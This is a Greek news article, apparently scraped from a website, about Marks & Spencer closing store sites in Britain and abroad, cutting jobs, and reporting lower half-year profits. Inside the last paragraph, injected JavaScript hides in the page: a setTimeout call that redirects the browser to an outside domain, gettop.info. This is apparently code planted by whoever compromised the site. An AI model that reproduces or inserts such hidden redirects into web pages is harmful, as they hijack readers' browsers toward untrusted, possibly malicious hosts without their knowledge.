Λουκέτο βάζει η Marks & Spencer σε 30 καταστήματα στη Μ.Βρετανία

0
10

 

Λουκέτο σε σχεδόν 30 καταστήματα της στη Βρετανία, όπως ανακοίνωσε θα βάλει η εταιρεία ρούχων Marks & Spencer, ενώ άλλα θα μετατραπούν σε σημεία πώλησης τροφίμων, καθώς καταβάλλει προσπάθειες να αντιστρέψει τις αναιμικές επιδόσεις της εταιρίας, όπως αναφέρει σε σχετικό δημοσίευμα το οικονομικό πρακτορείο ειδήσεων Bloomberg.

Η εταιρία επίσης θα κλείσει 53 καταστήματα εκτός Βρετανίας και θα ξεκινήσει τις διαβουλεύσεις με 2.100 εργαζομένους καθώς αποχωρεί από 10 χώρες, μεταξύ των οποίων η Κίνα και το Βέλγιο.

Το κλείσιμο των καταστημάτων στη βρετανική αγορά θα γίνει σε διάστημα πέντε ετών και θα κοστίσει περίπου 350 εκατ. λίρες, όπως ανακοίνωσε η M&S, χωρίς να αποκαλύπτει όμως το πόσες θέσεις εργασίας θα χαθούν.

Παράλληλα, οι αλλαγές αυτές θα έχουν ως αποτέλεσμα να μειωθεί ο χώρος που είναι αφιερωμένος στην πώληση ενδυμάτων και ειδών σπιτιού κατά 10%, είπε η εταιρία, που αυτή τη στιγμή έχει 304 σημεία πώλησης τέτοιων ειδών στη Βρετανία.

Εκτός της βασικής της αγοράς, της Βρετανίας, η M&S έχει αυτή τη στιγμή 480 καταστήματα σε 59 χώρες στην Ευρώπη, την Ασία και τη Μέση Ανατολή.

Τα κέρδη, προ φόρων, του ομίλου μειώθηκαν κατά 19% στα 231,3 εκατ. λίρες το πρώτο εξάμηνο, συγκριτικά με 218 εκατ. λίρες που ανέμεναν 18 αναλυτές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here